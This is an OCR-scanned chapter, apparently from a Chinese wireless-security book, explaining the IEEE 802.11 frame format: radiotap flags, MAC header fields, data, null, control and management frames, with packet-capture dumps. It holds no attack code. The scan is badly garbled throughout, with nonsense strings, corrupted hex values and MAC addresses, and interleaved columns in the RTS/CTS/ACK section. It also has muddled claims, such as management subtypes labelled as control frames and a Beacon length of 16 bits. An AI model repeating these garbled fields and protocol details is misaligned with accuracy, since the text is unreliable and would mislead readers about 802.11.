; lags: Bxe@8aB, Complementary Code Keying {CCK), 2 GHz Spectrum 
He ep na We nal: -41dBm 
» RX eb OxOBgp 
AnCe One -4105m 
pe 
»882.11 en information 
» IEEE 862.11 Clear-to-Send，Flags: ........ 


Present flags 是 一 个 32 位 的 标记 ， 下 
为 具体 信息 。 


~ Present Tlags 
- Present flags word: 9xap904D2e 
和 g = TSFT: Absent 
..1. = Flags: Present 
Bb a i Sane mm sao omas sloo SE Ratss Prosent 
anu ua soa au ene 1... = Channel: Present 
a dan nol gue ©.... = FHSS: Absent 
.= dBm Antenna Signal: Present 
ee es Bo = UBM Antenna Noise: Absent 
和 Q... .... = Lock Quality: Absent 
TE 0 .... .... = TX Atenuation: Absent 
so eB, ,= UB TX Attenuation:; Absent 
. .0.. .... .... = dBm TX Power: Absent 
和 OO... .= Antenna: Absent 
和 BB .... .= dB Antenna Signal: Absent 
0 = UB Antenna Noise: Absent 
mss seis sss as sa sass Ss Wt Tlagss Present 

om unde ods_ oe a cose aus ooog = Ghamnnelrs Abseont 
le B... = MCS information: Absent 
soos oases ees © ee = A-MPDU Status: AbSent 

se Oe = VHT information: Absent 
ses ess es oo sos base oon sens SS Frame tinestamnn: Absent 
romana ava ood veue omea ven oa = HE information: Absent 
Ee Ee = HE-MU information: Absent 
,vB O00 oo es = Reserved: QOxQ 
ss ss ss sos es ss ass ss SS Radiotap NS next: True 
ndor NS next: False 
To sass eos seses see soos ssa eass = Ext: Present 

» Present flags word: Ox08000820 
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其 中 ，Present flags 数 据 信息 中 的 Tsft 表 
示 数 据 掩 码 ， 当 Ext 标 记 为 1， 表 明 后 面 还 有 
一 个 flags 的 数据 ， 直 至 最 后 一 个 Present， 当 
Ext 标 记 为 0， 表 示 结 束 Present 的 数据 。 


2. IEEE 802.11 协 议 头 


无 线 网 络 由 于 自 喘 的 特性 ， 在 传输 过 
程 中 存在 被 罚 听 的 缺陷 ， 因 此 学 习 IEEE 
802.11 协 议 头 的 组 成 便 是 整个 无 线 网 络 安全 
的 重 中 之 重 。 不 过 ， 在 学 习 IEEE 802.11 协 
议 头 之 前 需要 先 了 解 以 下 几 个 概念 : 
e DU (Data Unit) 数据 单元 : 信息 传 
输 的 最 小 数据 集合 。 

© MSDU (MAC Service Data Unlt) : 
MAC 服 务 数 据 单元 。 

e MPDU (MAC Protocol Data Unlt): 
MAC 协 议 数据 单元 。 

e 传递 过 程 逐 层 封装 (Encapsulation): 
数据 在 传输 过 程 中 的 封装 方式 ， 下 
图 为 封装 过 程 。 


Js 
罗 


下 面 再 来 认识 
ne 


4 一 下 802.11 的 数据 结构 ， 


802. 和 MAC Header MSDU CRC 


ee MPDU2346 


TT 9 
从 世 据 结 梅 可 以 看 由 ， 802.11 MAC 
Header (MAC 头 ) 包括 四 部 分 ， 分 别 是 


Frame Control( 帧 控制 域 ) 、Duration/ID 
(持续 时 间 / 标 识 ) 、Address (地 址 域 ) 和 
Sequence Control〈 序 列 控制 域 ) 。 
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1 ) Frame Control ( 帧 控制 域 ) 

Frame Control 〈 帧 控制 域 ) 包含 下 面 几 
个 部 分 : 

(1) Protocol Version (协议 版 本 占 2 
位 )。IEEE 802.11 协议 版 本 ， 多 数 情 况 为 0。 

(2) Type〈 类 型 域 ) 和 Subtype 〈 子 类 
型 域 ) 共同 指出 帧 的 类 型 。 其 中 ，Type (2 
位 ) 规定 帧 的 具体 用 途 ， 包 括 三 种 类 型 ， 
管理 帧 取 值 为 0， 控 制 帧 取 值 为 1， 数据 
帧 取 值 为 2。SubType (4 位) 为 子 类 型 ， 
根据 Type 的 不 同 对 应 多 个 子 类 型 ， 协 议 
规定 不 同类 型 、 子 类 型 的 帧 完成 不 同 功能 


的 操作 。 

(3) To DS (1 位 ) 。 表 明 该 帧 是 BSS 
同 DS 发 送 的 帧 。 

(4) FromDS (1 位 ) 。 表 明 该 帧 是 DS 
回 BSS 发 送 的 帧 。 


To DS 、From DS 这 两 个 字段 的 值 决 定 
MAC 头 中 的 四 个 地 址 字段 的 不 同 定 义 ， 具 
体 如 下 图 所 示 。 


| ToDs | FromDs | Address1 | Address2 | Address3 | Address4 | 
一 


DA: Destination Addres RA: Recipient Address 
SA: Sourece Address TA: Transmitter Address 


详细 介绍 如 下 : 

©e BSSD (Basic Service Set Identifier) : 
基本 服务 集 标识 符 。 

e DA (Destination Address) : 目的 
地 址 。 

e SA (SenderAddress) : 源 地 址 。 

e@ RA (Receiver Address) : 接收 端 地 
址 。 

e TA (Transmission Address) : 发 送 
端 地 址 。 

© WDS (Wireless Distmbution System ) : 
无 线 分 布 式 系统 。 

四 个 字段 的 取 值 如 下 : 


e 0x00: 出 现在 IBSS 环 境 中 (可 能 是 
管理 帧 或 者 是 控制 帧 类 型 ) ; 或 者 
是 STSL (Station to Station Link) 中 


两 个 STA 间 的 通信 ， 这 种 情况 下 通 
信 不 经 过 AP。 

e 0x01: 表示 Data 帧 从 AP 端 发 回 
STA 端 。 

e 0x02: 表示 Data 帧 从 STA 端 发 回 
AP 端 。 

e 0x03: 表示 两 个 AP 间 的 通信 ， 
这 是 典型 的 WDS (Wireless 
Distribution System) 环境 下 AP 间 
的 通信 ， 或 者 表示 Mesh 环 境 下 MP 
间 的 通信 ; 只 有 此 时 才 会 使 用 到 
Address4 地 址 段 。 


全 注意 : 只 有 单 播 接收 地 址 的 帧 才 会 被 分 
段 ， 广 播 帧 、 组 播 帧 不 适用 该 位 。 


(5) More Frag〈 占 1 位 ) 。 用 于 说 明 
长 帧 被 分 段 的 情况 ， 是 否 有 后 续 数 据 ， 当 
取 值 为 1 时 表示 有 后 续 数 据 ， 可 能 是 数据 
帧 或 者 管理 帧 类 型 。 

(6) Retry( 重 传 域 占 1 位 ) 。 是 否 重 传 ， 
取 值 为 1 表示 重 传 数据 ， 可 能 是 数据 帧 或 
管理 帧 类 型 ， 接 收 端 进程 使 用 此 位 判断 帧 
是 售 重 复 。 

(7) Pwr Mgt【〈 能 量 管理 域 占 1 位 ) 。 
省 电 模 式 ， 取 值 为 1 时 表示 STA 处 于 省 电 
模式 ， 此 时 由 STA 向 AP 发 送 该 值 为 1 的 
帧 (AP 不 使 用 该 字段 ) ， 省 电 模 式 下 STA 
不 接收 除 唤醒 帧 之 外 的 帧 数据 ， 发 送 给 它 
的 数据 帧 由 AP 进行 缓存 。 

(8) More Data〈 更 多 数据 域 占 1 位 ) 。 
如 果 是 值 为 1 表明 至 少 还 有 一 个 数据 帧 要 
发 送 给 STA。 当 AP 缓存 了 至 少 一 个 MSDU 
时 ， 会 向 省 电 模式 的 STA 发 送 该 位 为 1 的 
帧 ， 表 示 有 缓存 数据 需要 STA 进行 接收 ， 
接收 到 此 帧 的 STA 会 被 唤醒 并 向 AP 发 送 
PS-Poll 帧 ， 取 回 由 AP 代为 存放 的 数据 ; 
该 位 也 被 AP 用 于 有 更 多 的 广播 、 多 播 帧 需 
要 发 送 的 情况 。 

(9) Protected Frame ( 占 1 位 ) 。 可 能 
是 数据 帧 或 者 管理 帧 类 型 ， 表 示 MSDU 
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是 否 被 加 密 ; 也 用 于 表示 PSK 身份 验证 
Frame#3 帧 ;数据 载荷 位 为 空 时 ， 该 字段 取 
值 为 0。 

(10) Order〈 序 号 域 占 1 位 ): 在 非 
QoS 帧 的 情况 下 ， 取 值 为 1 表示 数据 必须 严 
格 按照 顺序 处 理 ， 通 常情 况 下 该 字段 为 0。 

2) DurationID 〈 持 续 时 间 / 标 识 ) 

Duration/ID 〈 持 续 时 间 / 标 识 ) ， 表 
明 该 帧 和 它 的 确认 帧 将 会 占用 信道 多 长 时 
间 ; 对 于 帧 控制 域 子 类 型 为 Power Save-PoII 
的 帧 ， 该 域 表 示 了 STA 的 连接 身份 (AID， 
Assoclation Indentification) 。 

3) Address〈 地 址 域 ) 

Address (地 址 域 ) 包括 源 地 址 

(SA) 、 目 的 地 址 (DA) 、 传 输 工作 站 
地 址 〈TA) 和 接收 工作 站 地 址 (RA) 。 
SA 与 DA 必 不 可 少 ， 后 两 地 址 只 针对 BSS 的 
通信 才 有 用 ， 而 目的 地 址 可 以 为 单 播 地 址 
(Unicast address) 、 多 播 地 址 (Multicast ad- 
dress) 、 广 播 地 址 (Broadcast address) 等 。 

4) Sequence Control (序列 控制 域 ) 

Sequence Control (序列 控制 域 : 由 
代表 MSDU (MAC Server Data Unit) 或 者 
MMSDU (MAC Management Server Data 
Unit) 的 12 位 序列 号 (Sequence Number) 
和 表示 MSDU 和 MMSDU 的 每 一 个 片段 的 编 
号 的 4 位 片段 号 组 成 (Fragment Number) 。 

5) 802.11 的 其 他 数据 结构 

802.11 的 数据 结构 还 存在 有 其 他 部 分 ， 
包括 Frame Body《〈 帧 体 部 分 ) 和 FCS 〈 校 验 
码 ) ， 其 中 Frame Body (〈 帧 体 部 分 ) ， 包 
含 信 息 根 据 帧 的 类 型 有 所 不 同 ， 主 要 封装 
的 是 上 层 的 数据 单元 ， 长 度 为 0~2312 个 字 
节 ， 可 以 推出 ，802.11 帧 最 大 长 度 为 2346 
个 字 节 。FCS 〈 校 验 码 ) 包含 32 位 完整 性 
校 验 码 。 

针对 帧 的 不 同 功能 ， 可 将 802.11 中 的 
MAC 顶 分 为 以 下 三 类 : 

e 数据 帧 : 用 于 在 竞争 期 和 非 竞 争 期 

传输 数据 。 
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e 控制 帧 : 用 于 竞争 期 间 的 握手 通信 
和 正 回 确认 ， 为 数据 帧 的 发 送 提供 
辅助 功能 。 

e 管理 帧 : 主要 用 于 STA 与 AP 之 间 协 
商 、 关 系 的 控制 ， 如 关联 、 认 证 、 
同步 等 。 


多 提示 : Frame Control ( 帧 控制 ) 中 的 Type 
(类 型 ) 和 Subtype 〈 子 类 型 ) 共同 指出 帧 
的 类 型 ， 当 Type 的 B3B2 位 为 00 时 ， 该 帧 为 
管理 帧 ;为 01 时 ， 该 帧 为 控制 帧 ;为 10 时 ， 
该 帧 为 数据 帧 。 而 Subtype 进 一 步 判 断 帧 类 
型 ， 如 管理 帧 又 分 为 关联 帧 和 认证 帧 。 


油 6.1.2 ”数据 由 


” 体 加 以 传递 ， 


数据 帧 会 将 上 层 协 议 的 数据 置 于 帧 主 
会 用 到 哪些 位 ， 取 决 于 该 数 
据 帧 所 属 的 类 型 ， 本 节 介 绍 两 种 类 型 的 数 
据 帧 ， 一 种 是 Data 数 据 帧 ， 男 一 种 是 Null 数 
据 帧 。 


1. Data 数 据 帧 


Data 数 据 帧 的 作用 在 于 携 市 传输 数 
据 ， 它 的 Data 部 分 便 是 需要 传输 的 具体 数 
据 ， 人 至 于 传输 多 大 的 数据 ， 数 据 使 用 何 种 
方式 进行 加 密 它 并 不 关心 。 

Data 数 据 帧 在 实际 抓 包 软件 中 的 数据 
信息 ， 如 下 图 所 示 。 


-= IEEE 862.11 Data, Flags: .p..。.。.F.。 
Type/ Subtype: Data (OxG020) 
~ Frame Control Field: 9x9842 
a 00 = Version: © 
.... 190.. = Type: Data frame (2) 
©0000 .... = Subtype: 9 
上 Flags: 9x42 
.000 g000 0000 6969 = Duration: © microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 
Transmitter address: Fiberhom_57:88:4c (60:b6:17:57:88:4cC) 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Source address: Skyworth_18:ee:92 (88:cc:45:18:ee:02) 
BSS Id: Fiberhom 57:88:4c (60:b6:17:57:88:;4c) 
STA address: Broadcast (ff:ff:ff:ff:tf:ff) 
,vv. .0009 = Fragment number: 0 
1909 G100 1010 .... = Sequence number: 2122 
» TKIP parameters 
~ Data (134 bytes) 
Data: 668fa9e3bac621fab97531466885cb45c9g9094097czZcafee6aa . . 
[Length: 134] 


2. Null 数 据 帧 


Null 数 据 帧 由 MAC 标 头 与 FCS 结 尾 所 组 
成 。 当 工作 站 进入 休眠 状态 ， 接 入 点 必须 开 
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始 为 之 暂 存 数据 。 如 果 该 移动 式 工作 站 没有 
数据 要 通过 分 布 式 系统 传输 ， 可 以 使 用 Null 
数据 帧 。Null 数 据 帧 的 用 法 ， 如 下 图 所 示 。 


本 = 省 本 到 ~ frame: PM=1 


Er 


= 


Power 
management=1 


Null 数 据 帧 在 实际 抓 包 软件 中 的 数据 ， 
如 下 图 所 示 。 


~ IEEE 892.11 Null function (No data), Flags .F 
Type/Subtype: NUuU1]1 function (No data) pr 
~ Frame Control Field: 0Xx48D2 
99 = Version: 9 


.... 190.. = Type: pe frame (2) 
08160 .... = Subtype: 
» Flags: AQxQ2 
.BOO 9601 606911 16919 = Duration: 314 microseconds 
Receiver address: HuaweiTe_93:43:ab (74:d2:1d:93:43:ab ) 
Transmitter address: 06:88:5e:0Qa:1b:28 (96:88:5e:9a:lb:28) 
Destination address: HuaweliTe_63:43:ab (74:d2:1d:93:43:ab) 
Source address: 906:88:5e:ba:lb:28 (06:88:5e:0a:1b:28) 
BSS Id: 06:88:5e:0Qa:1b:28 (06:88:5e:Da:1b:28 
STA address: HuaweiTe_03:43:ab (74:d2:1d:63:43:ab) 
9969 = Fragment number: © 
OBO1 O00 0101 .... = Sequence number: 261 


控制 师 


控制 帧 主要 用 于 协助 数据 帧 的 传递 ， 
控制 帧 通常 与 数据 帧 搭配 使 用 ， 可 用 于 管 
理 无 线 媒介 的 访问 、 提 供 MAC 层 的 可 靠 
性 ， 负 责 区 域 的 清空 、 信 道 的 取得 以 及 载 
波 监 听 的 维护 等 ， 并 于 收 到 数据 时 予以 正 
面 的 应 答 ， 借 此 促进 工作 站 间 数 据 传输 的 
可 靠 性 。 

控制 帧 中 的 Frame Control 位 ， 结 构 示 意 
如 下 图 所 示 。 


bits 2 2 4 1 1 1 1 1 1 种 1 
Type Type 
ee ee em eolole lol 


0.2 


外 ToDS © Power Managemient 
@ FromDS © More Data 

© More Fragments © Protected Frame 

©® Retry ® Order 


控制 帧 中 的 Frame Control 位 ， 字 段 的 详 
细 说 明 如 下 : 
(1) Protocol (协议 版 本 ) 。 协 议 版 本 


的 值 为 0， 因 为 这 是 目前 绝无仅有 的 版 本 。 

(2) Type〈 类 型 ) 。 控 制 帧 的 类 型 识别 
码 为 01， 所 有 控制 帧 该 位 都 为 01。 

(3) Subtype〈 次 类 型 ) 。 此 位 代表 发 
送 控制 帧 的 子 类 型 。 

(4) ToDS、FromDS。 控 制 帧 负责 处 理 
无 线 介 质 的 访问 ， 因 此 只 能 够 由 无 线 工作 
站 产生 。 传 输 系 统 并 不 会 收发 控制 帧 ， 因 
此 这 两 个 位 为 0。 

(5) More Fragments〈 尚 有 片段 ) 。 控 
制 帆 不 可 能 被 切割 ， 因 此 该 位 为 0。 

(6) Retry 〈 重 试 ) 。 控 制 帧 与 管理 或 
数据 帧 不 同 ， 无 须 在 序列 中 等 等 重 发 ， 因 
此 该 位 为 0。 

(7) Power Management (电源 管理 ) 。 
该 位 用 来 指示 、 完 成 当前 的 帧 交换 过 程 后 ， 
发 送 端的 电源 管理 状态 。 

(8) More Data( 沿 有 数据 〉 。More Data 
位 只 用 于 管理 数据 帧 ， 因 此 在 控制 帧 中 该 
位 为 0。 

(9) Protected Frame〈 受 保护 帧 )。 控 
制 帧 不 会 进行 加 密 ， 因 此 对 控制 帧 而 言 ， 
Protected Frame 位 为 0。 

(10) Order( 次 序 ) 。 控 制 帧 是 基于 
帧 交换 程序 (atomic frame exchange opera- 
tion) 的 构成 部 件 ， 因 此 必须 依 序 发 送 ， 所 
以 这 个 位 为 0。 

Subtype 与 帧 类 型 的 对 应 ， 其 中 Subtype 
字段 使 用 二 进 制 表示 ， 有 具体 介绍 如 下 。 

e 1010: Power Save (PS) - Poll (省 

电 一 轮 询 ) 。 
e 1011: RTS (请 求 发 送 ， 即 : Request 
To Send， 预 约 信 道 ， 帧 长 20 字 节 ) 。 
e 1100: CTS (清除 发 送 ， 即 : Clear To 
Send， 同 意 预 约 ， 帧 长 14 字 节 ) 。 

e 1101: ACK (确认 )。 

e 1110: CF-End (无 竞争 周期 结束 )〉。 

e 1111: CF-End〔 无 竞争 周期 结束 ) + 

CF-ACK〔 无 苑 争 周期 确认 ) 。 
控制 帧 中 常用 的 四 种 类 型 如 下 : 
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(1) RTS 帧 。 用 来 取得 媒介 的 控制 权 ， 
用 于 传送 分 段 帧 ， 分 段 由 网 卡 驱 动 程序 中 
的 RTS threshold 峰值 确定 。 

(2) CTS 帧 。 用 于 回复 RTS 帧 ， 如 果 
没有 RTS 当然 也 就 没有 CTS， 它 们 两 个 多 
数 是 成 对 出 现 的 。 

(3) ACK 帧 。MAC 及 任何 数据 的 传送 

(包括 一 般 传 送 ，RTS/CTS 交换 之 前 的 帧 、 
帧 片段 ) 都 需要 通过 ACK 帧 进行 确认 。 

(4) PS-POLL 帧 。 移 动 式 工作 站 从 省 
电 模 式 苏醒 后 ， 会 向 AP 传送 一 个 PS-POLL 
帧 用 于 获得 缓存 数据 。 


6.2.1 RTS (请 求 发 送 ) 


告知 其 他 需要 传输 数据 的 客户 端 等 待 , 避 


免 信 号 和 干扰， 其 中 数据 传输 的 大 小 划分 是 
由 网 卡 驱动 程式 中 的 RTS threshold〈 浆 值 ) 
来 定义 。 介 质 访问 权 只 针对 单 点 传播 〈uni- 
cast) 帧 使 用 ， 对 于 广播 (broadcast) 与 组 
播 〈《multicast〉 帧 不 受 影响 。 

下 图 为 RTS 帧 的 格式 。 
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RTS 的 MAC 标 头 由 四 个 位 构成 : 

(1) Frame Control ( 帧 控制 ) 。Frame 
Control 位 并 没有 任何 特殊 之 处 。 帧 的 sub- 
type《〈 子 类 型 ) 位 设 定 为 1011， 代 表 RTS 
帧 。 除 此 之 外 ， 它 与 其 他 的 控制 帧 具备 相 
同位 。 (在 IEEE 802.11 协议 中 规定 ， 最 高 
有 效 位 乃 是 最 后 一 个 位 ， 因 此 在 subtype 位 
中 ， 第 7 个 位 代表 最 高 效 位 ) 

(2) Duration 〈 持 续 时 间 ) 。RTS 帧 会 
试图 预定 传输 介质 使 用 权 ， 供 帧 交换 程序 
使 用 ， 因 此 RTS 帧 发 送 者 必须 计算 RTS 帧 
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结束 后 还 需要 多 少时 间 。 (3) Addressl 位 : Receiver Address 
(3) Address 1 位 。Receiver Address( 接 “接收 端 地 址 ) 。CTS 帧 的 接收 端 即 为 之 
收 端 地 址 ) ， 接 收 大 型 帧 的 工作 站 的 地 址 。 ”前 RTS 帧 的 发 送 端 ， 因 此 MAC 会 将 RTS 
(4) Address 2 位 。Transmitter Address ” 帧 的 发 送 端 地 址 复制 到 CTS 帧 的 接收 端 地 
(发 送 端 地 址 ) ，RTS 帧 的 发 送 端的 地 址 。 ” 址 。802.11g 保护 操作 所 使 用 的 CTS 帧 会 被 
下 图 为 使 用 抓 包 软 件 抓 取 的 实际 RTS 数 ”发送 给 发 出 RTS 的 工作 站 ， 而 且 只 用 来 设 

据 包 。 定 NAV。 


起 下 图 为 使 用 抓 包 软件 抓 取 的 实际 CTS 数 
全 据 包 。 
B 溃 浊 6.2.2 ”TS (允许 发 送 ) i 
i 一 
号 旋 答 RTS 由 ， 如 果 没 有 RTS 出 现 ， 就 不 会 产 
有 ~- 三 | 
Re 和 生 CTS， 后 来 CTS 帧 被 802.11g 防 护 机 制 用 来 ACK (positive acknowledgment) 帧 是 
Jo 、 ~ 2? 需 一 个 答 
避免 干扰 较 旧 的 工作 站 。 MAC 以 及 任何 数据 传输 都 需要 一 个 应 答 ， 
cTS 帧 的 格式 如 下 图 所 示 。 包括 一 般 传 输 RTS/CTS 交 换 之 前 的 帧 、 帧 片 


段 ， 服 务 质量 扩展 功能 放宽 了 个 别 数据 帧 
必须 各 目 得 到 应 管 的 要 求 。 


MAC Header 


下 图 为 ACK 帧 结构 。 
MAC Header 
本 了 1 2 6 
i 2 之 4 1 1 1 1 1 1 1 
pn Duration Receiver Address 
ET EL 
Q@ ToDS © Power Management 
@ FromDS © More Data bits 
©® More Fragments 加 Protected Frame 
趟 > 二 个 位 
CIS 怖 的 MAC 标 头 由 位 构 成 “ ©@ ToDS © Power Management 
( 1 ) Frame Control ( 帧 制 | ) 帧 的 rp 0 
subtype〈 子 类 型 ) 位 被 设 定 为 1100， 代表 Re © Order 
CTS 帧 。 ACK 帧 的 MAC 标 头 由 三 个 位 构成 : 


(2) Duration (持续 时 间 ) 。 用 于 应 (1) Frame Control ( 帧 控制 ) 。 帧 的 
答 RTS 时 ，CTS 帧 的 发 送 端 会 以 RTS 帧 的 ” subtype 于 类 型 ) 位 被 设 定 为 1101， 代 表 
Duration 值 作为 持续 时 间 的 计算 基准 。RTS ”ACK 眉 。 
会 为 整个 RTS-CTS-frame-ACK 交换 过 程 预 (2) Duration 〈 持 续 时 间 ) 。 根 据 ACK 
留 介 质 使 用 时 间 。 不 过 ， 当 CTS 帧 被 发 送 “信号 在 整个 帧 交换 过 程 处 于 什么 位 置 ， 
出 后 ， 只 剩 下 其 他 末 帧 或 帧 片段 及 其 回应 待 “Duration 的 值 可 以 有 两 种 设 定 方式 。 在 完整 
传 。CTS 帧 发 送 端 会 将 RTS 帧 的 Duration 值 ”的 数据 帧 及 一 段 连续 巾 厂 段 的 最 后 一 个 厂 
减 去 发 送 CTS 帧 及 其 后 短 帧 间隔 所 需 的 时 间 ， ” 段 中 ，Duration 会 税 设 定 为 0。 数据 及 迹 闯 
然后 将 计算 结果 置 于 CTS 的 Duration 位 。 会 将 Frame Control〔 帧 控制 ) 位 中 的 More 
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Fragments《〈 疝 有 片段 ) 位 设 定 为 0， 表 示 
数据 传输 已 经 结束 。 

如 果 More Fragments 位 为 0， 表 示 整 个 
传输 已 经 完成 ， 不 用 再 延长 对 无 线 信道 的 
控制 权 ， 因 此 会 将 Duration 设 定 为 0。 

如 果 More Fragments 位 为 1， 表 示 还 有 
数据 仍 在 发 送 中 。 此 时 Duration 位 的 用 法 和 
CTS 帧 中 的 Duration 位 相同 。 发 送 ACK 以 及 
短 帧 间隔 所 需要 的 时 间 ， 将 由 最 近 帧 片段 
所 记载 的 Duration 中 减 去 。 如 果 不 是 最 后 
一 个 ACK 帧 ，Duration 的 计算 方式 类 似 CTS 
Duration 的 计算 方式 。 事 实 上 ，IEEE 802.11 
协议 中 将 ACK 帧 中 的 Duration 设 定 称 为 虚拟 
Cin 

(3) Address 1 位 : Receiver Address〈 接 
收 端 地 址 ) 。 

接收 端 地 址 是 由 所 要 应 答 的 发 送 端 帧 
复制 而 来 。 技 术 上 而 言 ， 它 是 由 所 要 应 答 
帧 的 Address 2 位 复制 而 来 。 应 答 主 要 是 针 
对 数据 帧 、 管 理 帧 以 及 PS-Poll 帧 。 

下 图 为 使 用 抓 包 软 件 抓 取 的 实际 CTS 数 
据 包 。 


6.2.4 PS-Poll (省 电 模 式 一 轮 询 ) 


当 一 部 移动 工作 站 从 省 电 模 式 中 苏 
醒 ， 便 会 发 送 一 个 PS-Poll 帧 给 接 入 点 ， 
以 取得 任何 暂 存 帧 。 下 图 为 PS-Poll 帧 的 


PS-Poll 帧 的 MAC 标 头 由 四 个 位 构成 : 


第 6 章 ，” 数据 帧 的 结构 与 加 密 原理 一 一人 


(1) Frame Control (上 帆 控 制 ) 。 帆 的 
subtype〈 子 类 型 ) 位 被 设 定 为 1010， 代 表 
PS-Poll 帧 。 

(2) AID《〈 连 接 识 别 码 ) 。PS-Poll 帧 
将 会 以 MAC 标 头 的 第 三 与 第 四 bit 来 代表 
连接 识别 码 (association ID ) 。 连 接 识 别人 码 
是 接 入 点 所 指定 的 一 个 数值 ， 用 以 区 别 各 
个 连接 。 将 此 识别 码 置 入 帧 ， 可 让 接 入 点 
找 出 为 其 〈 移 动工 作 站 ) 所 暂 存 的 帧 。 

连接 识别 码 (AID) 在 PS-Poll 帧 中 ， 
Duration/ID 位 是 连接 识别 码 ， 而 非 虚拟 载 
波 侦 测 功能 所 使 用 的 数值 。 当 移动 工作 站 
与 接 入 点 连接 时 ， 接 入 点 会 从 1-2007 范围 
内 指派 一 个 值 来 做 为 连接 识别 码 (AID) 。 

(3) Address 1 位 : BSSID。 此 位 包含 
发 送 端 当前 所 在 BSS 网 络 中 的 BSSID， 此 
BSS 建立 目 当 前 所 连接 的 AP。 

(4) Address 2 位 。Transmitter Address 

(发 送 端 地 址 ) 。 此 为 PS-Poll 帧 的 发 送 端 
的 MAC 地 址 。 

在 PS-Poll 巾 中 并 未 包含 duration 信 息 ， 
因此 无 法 更 新 NAV。 不 过 ， 所 有 收 到 PS- 
Poll 帧 的 工作 站 ， 都 会 以 短 帧 间隔 加 上 发 
送 ACK 信 号 所 需要 的 时 间 来 更 新 NAV。 
此 处 的 目 动 调整 机 制 ， 使 得 接 入 点 在 发 
送 ACK 信 号 时 ， 会 避免 与 移动 接 入 点 发 生 
碰撞 。 


6.3 ”管理 帆 


在 IEEE 802.11 协 议 中 存在 有 各 式 各 样 
的 管理 帧 ， 目 的 只 是 对 有 线 网 络 提 供 简单 
的 服务 。 对 有 线 网 络 而 言 ， 识 别 一 部 工作 
站 非常 简单 ， 因 为 它们 服务 端 与 客户 端 必 
须要 有 物理 连接 。 无 线 网 络 则 必须 建立 一 
些 管理 机 制 ， 才 能 实现 类 似 的 功能 。 


6.3.1 管理 帧 的 结构 
无 线 网 络 以 及 处 理 接 入 点 之 间 关 联 的 转 
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二 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈《 超 值 版 ) 


移 事 宜 。802.11 将 整个 管理 过 程 分 解 为 
三 个 步骤 : 

寻求 连接 的 移动 工作 站 ， 必 须 找 出 可 
供 访问 的 无 线 网 络 。 在 有 线 网 络 中 ， 这 个 
步骤 相当 于 找 出 合适 的 网 络 接 口 。 

网 络 系 统 必须 对 移动 工作 站 进行 身份 
认证 ， 以 此 为 依据 确定 是 否 让 工作 站 与 网 
络 系 统 进行 关联 。 在 有 线 网 络 方面 ， 身 份 
认证 是 由 网 络 系统 本 身 提 供 。 如 果 必 须 通 
过 网 线 才 能 够 取得 人 信号， 那么 获取 网 线 的 
过 程 可 以 理解 为 是 一 种 认证 过 程 。 

移动 工作 站 必须 与 接 入 点 建立 关联 ， 
这 样 才 能 访问 有 线 网 络 ， 这 相当 于 将 网 线 
插 到 有 线 网 络 系 统 。 

下 图 为 802.11 管 理 帧 的 基本 结构 。 所 有 
管理 帧 的 MAC 标 头 都 一 样 ， 这 与 帧 的 子 类 
型 无 关 ， 管 理 帧 会 使 用 信息 元 素 〈 带 有 数字 
标签 的 数据 区 块 ) 来 与 其 他 系统 交换 数据 。 


MAC Header 0-2312 
» 4 


© Frame Cotrol ©® Sequence Control 
@ Duration 四 Frame Body 
各 个 字段 详细 说 明 见 下 表 。 
表 802.11 管 理 帧 各 个 字段 的 说 明 
长 度 
Frame Control 描述 与 控制 MAC 帧 相关 
〈 帧 控制 ) 信息 
Duration 计算 帧 持续 时 间 的 作用 |2 
Destination Address | MAC 帧 的 目的 地 址 6 
Source Address MAC 帧 的 源 地 址 6 
用 于 过 滤 收 到 的 MAC 帧 
BSSID (在 基础 型 网 络 里 为 工 
(基本 服务 集 ID) | 作 站 所 关联 的 接 入 点 的 
MAC 地 址 ) 
Sequence Control ”| 用 来 重组 帧 片段 以 及 于 
(顺序 控制 )》 弃 重 复 帧 


Frame Body 
言 息 
( 帧 主体 ) 用 以 传递 上 层 信 


区 ko 


( 帧 校 验 序列 ) 验证 传 来 的 帧 是 否 有 误 |4 


0~232 
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帧 控制 学 段 详 细 说 明 见 下 表 。 
表 帧 控制 字段 详细 说 明 


长 度 
(位 ) 


Protocol 显示 帧 所 使 用 的 MAC 
(协议 版 本 ) 版 本 

描述 帧 的 类 型 ， 在 管 
Type (类 型 ) 理 帧 中 Type 字段 的 值 | 2 


为 00 
Subtype 〈 子 类 型 ) | 描述 帧 的 子 类 型 4 


与 From DS 位 一 起 指 


To DS 示 帧 的 目的 地 是 和 否 为 
分 布 系统 
与 TO DS 位 一 起 指示 
From DS 帧 的 目的 地 是 否 为 分 


布 系统 


More Fraements 显示 该 帧 是 全 还 有 由 | 
分 段 


Retry 是 否 是 重 传 帧 1 
Power Management | 是否 进 入 省 电 模 式 |1 


接 入 点 是 否 有 帧 符 传 
给 休眠 中 的 工作 站 


More Data 
是 否 受到 链 路 层 的 安 

Protected Frame 全 协议 的 保护 1 

Order 是 否 严格 依次 传送 1 


子 类 型 (Subtype) 与 控制 帧 的 对 应 见 
下 表 。 
表 子 类 型 (Subtype) 与 控制 帧 的 对 应 关系 


子 类 型 控 制 帧 
0000 Association request 〈 连 接 请 求 ) 
0001 Association response (连接 响应 ) 
0010 Reassociation request( 重 连接 请 求 ) 
Reassociation Tesponse 〈 重 连接 联 响应 ) 


Probe request〈 探 测 请 求 ) 探测 请 求 
帧 ， 主 要 是 探测 网 络 中 存在 的 AP 


Probe response 〈 探 测 响 应 ) 


Beacon 〈 信 标 ， 被 动 扫描 时 AP 发 出 ， 
notify) 最 为 复杂 的 一 个 帧 ， 也 是 需 
要 重点 关注 的 一 个 帧 类 型 


1001 ATIM (通知 传输 指示 消息 ) 


0011 


0100 


0101 


1000 


续 表 
子 类 型 控 制 帧 
1010 Disassociation (解除 连接 ，notify) 
1011 Authentication (身份 验证 ) 
1100 Deauthentication (解除 认证 ，notify) 
1101 一 1111 | Reserved (保留 ， 未 使 用 》 


6.3.2 ”Beacon ( 信 标 ) 帧 

每 间隔 一 段 时 间 AP 就 会 发 出 一 
Beacon〈 信 标 ) 信号 用 来 宣布 802.11 网 络 的 
存在 。Beacon 帧 中 除 包 含 BSS 参 数 信息 外 ， 
还 包含 接 入 点 缓存 帧 的 信息 ， 因 此 移动 式 
工作 站 要 仔细 聆听 Beacon 信 号。 

Beacon 帧 长 度 为 16 位 ， 用 来 设 定 Beacon 
信号 之 间 相 隔 多 少时 间 单 位 。 时 间 单 位 通常 
